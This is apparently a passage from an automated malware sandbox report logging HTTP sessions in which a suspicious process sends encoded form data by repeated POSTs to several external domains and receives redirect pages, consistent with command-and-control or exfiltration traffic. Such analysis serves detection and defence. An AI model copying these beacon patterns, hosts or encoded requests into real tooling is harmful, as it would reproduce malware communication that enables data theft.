                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 33 52 67 51 6e 75 30 71 31 57 39 50 68 33 2f 51 65 46 6e 61 4e 77 57 78 6e 49 59 6a 76 6e 47 42 72 68 4f 50 71 78 67 75 50 41 69 76 79 4b 49 5a 66 6d 4c 45 33 55 64 73 79 54 6e 42 46 6b 39 54 30 70 79 6f 63 51 31 50 5a 4f 4b 6f 69 54 6b 6e 50 55 75 6e 57 33 6d 54 38 49 2b 36 38 49 47 55 62 77 75 57 7a 42 73 48 43 41 56 6c 79 50 51 51 70 2f 4e 52 46 2b 53 30 54 43 6b 59 48 47 37 56 4f 6e 51 62 2f 74 48 42 4e 4d 4b 39 6e 37 4d 56 4e 45 4b 62 53 59 43 54 36 50 6a 7a 32 7a 6e 54 4e 66 30 48 55 72 53 57 50 4c 6b 50 50 35 5a 35 51 67 50 6e 6e 6e 36 63 72 67 4c 7a 58 71 70 4f 67 73 65 49 72 36 6f 79 37 33 35 66 64 42 2f 32 78 31 77 76 5a 7a 6f 30 37 50 59 4c 72 41 51 37 74 4a 51 55 56 44 66 73 74 58 6a 65 6f 36 6d 64 45 4c 42 33 6e 33 7a 56 6f 61 43 49 53 47 79 70 36 6f 7a 56 4f 58 70 36 32 42 73 67 73 4c 79 64 31 4e 73 49 72 67 6d 35 42 66 66 78 6d 44 4b 50 74 37 4d 34 34 59 74 63 2b 59 6c 61 43 75 73 69 33 32 68 36 50 4b 61 5a 64 4c 2b 63 62 5a 75 45 4b 44 71 50 65 75 2f 4f 61 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=3RgQnu0q1W9Ph3/QeFnaNwWxnIYjvnGBrhOPqxguPAivyKIZfmLE3UdsyTnBFk9T0pyocQ1PZOKoiTknPUunW3mT8I+68IGUbwuWzBsHCAVlyPQQp/NRF+S0TCkYHG7VOnQb/tHBNMK9n7MVNEKbSYCT6Pjz2znTNf0HUrSWPLkPP5Z5QgPnnn6crgLzXqpOgseIr6oy735fdB/2x1wvZzo07PYLrAQ7tJQUVDfstXjeo6mdELB3n3zVoaCISGyp6ozVOXp62BsgsLyd1NsIrgm5BffxmDKPt7M44Ytc+YlaCusi32h6PKaZdL+cbZuEKDqPeu/Oa9NUxuVF5C9dZekhobqqG99Ha7ruaLKSUqyvC+7AnOKCZl4RRqsSrrz7J0xmwScY6ot5tZsDAG5r/FKqFhT6RwVpxlEX2pMwW+fWNq2dat2nXlZloViNkoEtzTowq5T6J7MclkP8lrppJIfQtIcNuaAojcBa50S2jUMwnGbRjgY107o4tzAYOwn0FCn6T7vwZmN8xNYELFoleRGl2RbNsQqGiLweqpjbL8aeuexgBFSK8EBRy+zDDpeJR/RY2epmroc4SzjTeF8SOjNSTSU6CKaTP7juuOpSGvKHhL4G5GT0+iVSjaMBm1M0vGsrlU7XMcpaap+ez+wT7dQvr7yTRbStB3Ub35omDEsH8Zf7Fkdcm6Kpu2wiUGcnxH8ll8HinaRmXJ85L6a6zbC7Oj8EW7ec4aHUYjc3K7JixhnZ6x4ZXyaA4RLIEaDlHW8CcpWvSMuWpndDKF3Cton9Nd9OnV4yyuGi9Nb7Hoxrgw0Mgp6c3cXf2B6Sthzo16JpLCJRof+9aB4JbuT8aR/3PnzcwhaVdaDx4slsHlV1Ad84mviVdWvgIMc9RGo3mYpL3qELeFOy1XPOhcoseu7I+T0S0+HRxnXIcX/9OicUP2qQPCxKJDwSNk7B/nK8FxvwRcsnvzQzw/f1uX9yE4CBLdlBNx08FmMOg1hTlrT [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:41:23.425856113 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            20192.168.2.5501063.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:25.002953053 CET551OUTGET /gofy/?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ== HTTP/1.1
                                                                                                                                                                            Host: www.wiretap.digital
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:41:26.093805075 CET394INHTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:41:25 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 4a 6c 30 39 3d 31 5a 5a 38 4a 6c 6f 48 73 54 26 78 36 6c 50 4a 4c 43 50 3d 36 54 49 77 6b 61 4d 4b 38 32 4a 55 32 6c 54 34 50 32 62 67 4a 69 50 41 76 49 63 36 6a 58 71 64 2b 6a 37 75 2b 33 68 4a 47 6a 6e 47 70 66 51 69 58 51 50 77 6c 78 31 53 79 6c 76 6b 47 7a 52 55 6a 4e 2f 58 56 79 46 5a 64 64 33 5a 72 47 74 30 52 79 36 69 59 77 71 31 68 71 4f 7a 31 5a 4c 6d 52 69 71 34 79 48 6f 5a 50 52 67 75 76 73 59 51 69 4f 41 61 4a 4e 4c 4c 4b 69 74 46 47 30 47 6e 63 51 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rJl09=1ZZ8JloHsT&x6lPJLCP=6TIwkaMK82JU2lT4P2bgJiPAvIc6jXqd+j7u+3hJGjnGpfQiXQPwlx1SylvkGzRUjN/XVyFZdd3ZrGt0Ry6iYwq1hqOz1ZLmRiq4yHoZPRguvsYQiOAaJNLLKitFG0GncQ=="}</script></head></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            21192.168.2.5501073.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:31.768153906 CET798OUTPOST /5l50/ HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.it2sp8.vip
                                                                                                                                                                            Referer: http://www.it2sp8.vip/5l50/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 6d 4d 45 30 5a 58 30 63 5a 47 74 75 6c 41 74 38 79 43 2f 64 58 55 4c 64 47 38 36 2f 57 6c 4c 33 73 2b 73 57 34 59 78 66 53 7a 72 58 56 43 4e 4c 63 4d 52 72 52 6b 5a 7a 76 78 62 54 56 42 70 79 34 31 44 2b 74 66 74 6f 39 6e 64 63 4d 74 74 78 57 32 7a 6b 66 77 41 67 67 75 53 44 44 38 2b 6d 63 56 59 71 39 32 4c 73 66 6d 45 36 61 47 59 53 34 4f 4a 4e 6d 6c 37 61 58 72 41 79 4b 65 65 63 74 67 39 49 66 57 2b 59 58 38 6b 49 59 72 4a 53 48 57 4b 4c 34 44 56 35 74 41 5a 65 61 38 78 62 79 49 41 76 38 37 6c 78 71 63 38 53 48 2b 2f 50 57 38 2f 4c 30 32 2f 46 54 75 68 2b 6c 79 5a 71 57 39 4c 70 41 6e 45 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=mME0ZX0cZGtulAt8yC/dXULdG86/WlL3s+sW4YxfSzrXVCNLcMRrRkZzvxbTVBpy41D+tfto9ndcMttxW2zkfwAgguSDD8+mcVYq92LsfmE6aGYS4OJNml7aXrAyKeectg9IfW+YX8kIYrJSHWKL4DV5tAZea8xbyIAv87lxqc8SH+/PW8/L02/FTuh+lyZqW9LpAnE=
                                                                                                                                                                            Dec 11, 2024 09:41:32.878454924 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            22192.168.2.5501083.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:34.422874928 CET818OUTPOST /5l50/ HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.it2sp8.vip
                                                                                                                                                                            Referer: http://www.it2sp8.vip/5l50/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 6d 4d 45 30 5a 58 30 63 5a 47 74 75 6b 67 64 38 78 68 58 64 51 30 4c 61 59 4d 36 2f 50 31 4b 38 73 2b 67 57 34 5a 6b 45 53 42 50 58 56 6a 64 4c 66 49 46 72 53 6b 5a 7a 67 52 62 57 49 78 6f 66 34 31 2b 44 74 65 52 6f 39 6e 4a 63 4d 70 70 78 4b 52 6e 6a 5a 67 41 75 31 2b 53 42 4d 63 2b 6d 63 56 59 71 39 79 72 43 66 69 51 36 61 79 6b 53 35 76 4a 4f 73 46 37 56 65 4c 41 79 62 75 65 59 74 67 39 71 66 55 4b 79 58 2f 51 49 59 70 52 53 48 48 4b 49 7a 44 56 2f 67 67 59 43 62 74 59 7a 37 72 74 68 33 61 4d 65 2b 39 45 4a 43 49 4f 6c 4d 65 33 6a 6e 57 54 39 44 39 70 4a 30 43 34 44 4d 65 62 5a 65 77 54 75 64 74 52 5a 58 2b 62 67 63 4a 55 57 52 43 68 6e 71 34 56 62
                                                                                                                                                                            Data Ascii: x6lPJLCP=mME0ZX0cZGtukgd8xhXdQ0LaYM6/P1K8s+gW4ZkESBPXVjdLfIFrSkZzgRbWIxof41+DteRo9nJcMppxKRnjZgAu1+SBMc+mcVYq9yrCfiQ6aykS5vJOsF7VeLAybueYtg9qfUKyX/QIYpRSHHKIzDV/ggYCbtYz7rth3aMe+9EJCIOlMe3jnWT9D9pJ0C4DMebZewTudtRZX+bgcJUWRChnq4Vb
                                                                                                                                                                            Dec 11, 2024 09:41:35.520178080 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            23192.168.2.5501093.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:37.081202030 CET1739OUTPOST /5l50/ HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.it2sp8.vip
                                                                                                                                                                            Referer: http://www.it2sp8.vip/5l50/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 6d 4d 45 30 5a 58 30 63 5a 47 74 75 6b 67 64 38 78 68 58 64 51 30 4c 61 59 4d 36 2f 50 31 4b 38 73 2b 67 57 34 5a 6b 45 53 42 48 58 56 7a 42 4c 64 70 46 72 63 45 5a 7a 70 78 62 58 49 78 6f 6e 34 31 57 48 74 65 64 34 39 6b 78 63 65 61 68 78 47 30 62 6a 58 67 41 75 33 2b 53 43 44 38 2f 73 63 56 70 74 39 32 48 43 66 69 51 36 61 7a 30 53 77 65 4a 4f 71 46 37 61 58 72 41 32 4b 65 66 2f 74 67 45 49 66 55 66 48 58 73 49 49 62 4a 42 53 47 31 69 49 73 7a 56 39 6c 67 59 4b 62 74 45 73 37 72 77 51 33 61 34 6e 2b 36 67 4a 41 4e 66 46 4a 73 7a 75 77 33 4c 71 46 61 78 46 6b 45 45 45 50 6f 6a 61 61 52 4c 34 51 73 6c 71 41 71 6a 44 49 39 41 53 4e 6b 5a 31 6e 39 55 4a 38 52 30 31 58 76 6b 66 4f 42 43 30 4e 33 52 43 53 4c 6c 41 4c 71 4c 42 52 59 69 6c 67 32 56 2f 75 79 75 5a 49 49 65 58 58 4b 76 61 77 4e 62 6e 56 6c 30 7a 47 45 30 71 58 53 50 38 69 67 37 30 4c 38 34 4e 52 79 4c 65 70 56 58 4e 38 51 68 34 56 61 50 45 4a 65 54 35 67 71 6a 75 67 31 6d 64 4c 35 68 79 70 42 73 73 35 6e 79 4f 75 [TRUNCATED]
                                                                                                                                                                            Data Ascii: x6lPJLCP=mME0ZX0cZGtukgd8xhXdQ0LaYM6/P1K8s+gW4ZkESBHXVzBLdpFrcEZzpxbXIxon41WHted49kxceahxG0bjXgAu3+SCD8/scVpt92HCfiQ6az0SweJOqF7aXrA2Kef/tgEIfUfHXsIIbJBSG1iIszV9lgYKbtEs7rwQ3a4n+6gJANfFJszuw3LqFaxFkEEEPojaaRL4QslqAqjDI9ASNkZ1n9UJ8R01XvkfOBC0N3RCSLlALqLBRYilg2V/uyuZIIeXXKvawNbnVl0zGE0qXSP8ig70L84NRyLepVXN8Qh4VaPEJeT5gqjug1mdL5hypBss5nyOuuqhsdHWUQtSILoE5odE+4hg+3clvLNXeuc50LQulHyC0jpKIOVTUm53lavpK0xiQZVxnOj0OVE3VxT3NwM988pRYgy4LSn9G2ZAEjNadjFAUyTy6M80wZvNuOymftRE6rXtC+77lTBHtYuyflc1rdf5ysWEiIhBt5WGMpbe1PgpA41eivVbun7SrQ8oah081DKvYyTIwCxjczyHRLMM47Utlcj7fwxWc5CeujhYVWu3MVaki3jBJAsSAN78ofwBaQwEunKp5T0+begSxsCnVapixE5uwpOgyp4EM+mwsjOWWxPo/pQqDDR+kh0pS7FUIXteN5HWf6PzMk4IvbvyZf3plnSFX6Klt390w25JcXopyqWmb/JsdoRWhubOLDzsBTIrArgOFOia0Y0aJl2a5S5zMdGXuZadFF5Ir7d8D6c1t0JQuITQ8Eflmyq09vbKQtSkXE0htHxf5r1kLqeyvISOVApwY8Uh77RnJYZqDLeOdrmbDK1SAFyDVXLAcFf9dN0m3JyyBfd0rbzjMwDukJpd5gQDOv0sHrbXaB65RTQ9sE8YBPhKwf7PWGdOZa/GLdRTavhDBtKMQjxeyhthYYNs1ASJAsSdzDGZ4AY54iTgNGHQfJsfuWmwM40/pg9pUYw1a3UdI6K3937J76j2B8zS+jGQCkmbkQM [TRUNCATED]
                                                                                                                                                                            Dec 11, 2024 09:41:38.158431053 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            24192.168.2.5501103.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:39.727699041 CET546OUTGET /5l50/?x6lPJLCP=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBnieG4J/eeLMerUPxhx3GPRLnwREz1wysoKm2qVDM0wOtjw3A==&rJl09=1ZZ8JloHsT HTTP/1.1
                                                                                                                                                                            Host: www.it2sp8.vip
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Connection: close
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Dec 11, 2024 09:41:40.814867020 CET394INHTTP/1.1 200 OK
                                                                                                                                                                            content-type: text/html
                                                                                                                                                                            date: Wed, 11 Dec 2024 08:41:40 GMT
                                                                                                                                                                            content-length: 273
                                                                                                                                                                            connection: close
                                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 78 36 6c 50 4a 4c 43 50 3d 72 4f 73 55 61 6e 38 56 62 46 68 4e 76 78 59 45 39 68 48 56 53 53 61 2f 53 62 7a 52 56 6e 4f 52 78 50 39 47 79 5a 41 37 53 52 50 4c 54 56 74 38 53 4b 46 46 61 51 41 73 67 56 7a 6d 56 77 49 7a 6a 51 69 41 69 63 78 4f 37 57 52 66 4f 49 68 52 50 42 6e 69 65 47 34 4a 2f 65 65 4c 4d 65 72 55 50 78 68 78 33 47 50 52 4c 6e 77 52 45 7a 31 77 79 73 6f 4b 6d 32 71 56 44 4d 30 77 4f 74 6a 77 33 41 3d 3d 26 72 4a 6c 30 39 3d 31 5a 5a 38 4a 6c 6f 48 73 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?x6lPJLCP=rOsUan8VbFhNvxYE9hHVSSa/SbzRVnORxP9GyZA7SRPLTVt8SKFFaQAsgVzmVwIzjQiAicxO7WRfOIhRPBnieG4J/eeLMerUPxhx3GPRLnwREz1wysoKm2qVDM0wOtjw3A==&rJl09=1ZZ8JloHsT"}</script></head></html>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            25192.168.2.5501113.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:46.470304012 CET816OUTPOST /cvmn/ HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.cbprecise.online
                                                                                                                                                                            Referer: http://www.cbprecise.online/cvmn/
                                                                                                                                                                            Content-Length: 209
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 70 52 65 76 57 6f 75 34 46 6a 71 6d 4c 49 79 41 44 57 79 43 58 6f 75 2f 36 31 52 72 65 35 63 2b 6d 2b 2f 6d 62 63 4e 66 2f 58 32 47 41 64 75 72 75 4c 4f 56 69 71 55 70 44 30 34 49 55 51 75 52 4d 38 70 76 56 6b 62 38 69 34 6a 48 59 47 76 76 2f 58 71 64 38 63 57 37 55 64 51 71 52 67 76 34 4e 4b 2b 4d 51 30 4f 67 62 68 45 5a 47 2b 52 71 65 41 74 65 34 5a 53 78 30 67 58 55 77 36 72 4f 67 4b 44 68 39 30 6f 35 55 2f 71 70 53 78 79 36 62 36 6b 57 6b 76 75 70 4e 70 44 49 71 59 51 50 58 4b 42 36 42 71 51 7a 6b 38 49 76 6f 70 75 4d 6a 6e 75 41 65 6f 34 7a 6a 6e 70 38 38 2f 53 48 54 76 46 57 46 36 67 3d
                                                                                                                                                                            Data Ascii: x6lPJLCP=pRevWou4FjqmLIyADWyCXou/61Rre5c+m+/mbcNf/X2GAduruLOViqUpD04IUQuRM8pvVkb8i4jHYGvv/Xqd8cW7UdQqRgv4NK+MQ0OgbhEZG+RqeAte4ZSx0gXUw6rOgKDh90o5U/qpSxy6b6kWkvupNpDIqYQPXKB6BqQzk8IvopuMjnuAeo4zjnp88/SHTvFWF6g=
                                                                                                                                                                            Dec 11, 2024 09:41:47.548088074 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            26192.168.2.5501123.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:49.125499010 CET836OUTPOST /cvmn/ HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.cbprecise.online
                                                                                                                                                                            Referer: http://www.cbprecise.online/cvmn/
                                                                                                                                                                            Content-Length: 229
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
                                                                                                                                                                            Data Raw: 78 36 6c 50 4a 4c 43 50 3d 70 52 65 76 57 6f 75 34 46 6a 71 6d 49 6f 69 41 43 78 6d 43 52 49 75 2b 2b 46 52 72 55 5a 63 36 6d 2b 7a 6d 62 5a 31 50 2b 6c 53 47 42 2f 32 72 76 4f 69 56 6a 71 55 70 57 45 34 48 62 77 75 4f 4d 38 6c 4e 56 6b 58 38 69 34 6e 48 59 48 66 76 2f 6b 79 61 75 38 57 39 62 39 51 73 4f 77 76 34 4e 4b 2b 4d 51 30 71 5a 62 68 63 5a 47 50 68 71 4d 78 74 66 37 5a 53 32 2b 41 58 55 37 61 72 4b 67 4b 43 32 39 31 30 66 55 38 65 70 53 7a 61 36 56 50 51 56 39 66 75 76 4a 70 43 6e 73 61 64 77 5a 62 78 64 46 35 77 77 36 61 49 4a 67 2f 66 6d 35 46 6d 6f 4e 49 55 4c 7a 30 68 4c 74 50 7a 75 4a 4d 56 6d 62 74 31 6d 4a 51 6a 5a 37 43 54 37 48 77 37 36 4c 46 65 79 49 72 63 78
                                                                                                                                                                            Data Ascii: x6lPJLCP=pRevWou4FjqmIoiACxmCRIu++FRrUZc6m+zmbZ1P+lSGB/2rvOiVjqUpWE4HbwuOM8lNVkX8i4nHYHfv/kyau8W9b9QsOwv4NK+MQ0qZbhcZGPhqMxtf7ZS2+AXU7arKgKC2910fU8epSza6VPQV9fuvJpCnsadwZbxdF5ww6aIJg/fm5FmoNIULz0hLtPzuJMVmbt1mJQjZ7CT7Hw76LFeyIrcx
                                                                                                                                                                            Dec 11, 2024 09:41:50.205652952 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                            content-length: 0
                                                                                                                                                                            connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            27192.168.2.5501133.33.130.190804352C:\Program Files (x86)\lUojpVVEubSRrtYktEitslorEEcrhqSoLCCXKdfuXGgLvD\tCyxXhRNgdPI.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            Dec 11, 2024 09:41:51.768727064 CET1757OUTPOST /cvmn/ HTTP/1.1
                                                                                                                                                                            Host: www.cbprecise.online
                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                            Origin: http://www.cbprecise.online
                                                                                                                                                                            Referer: http://www.cbprecise.online/cvmn/
                                                                                                                                                                            Content-Length: 1149
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; Tablet PC 2.0; MALNJS)
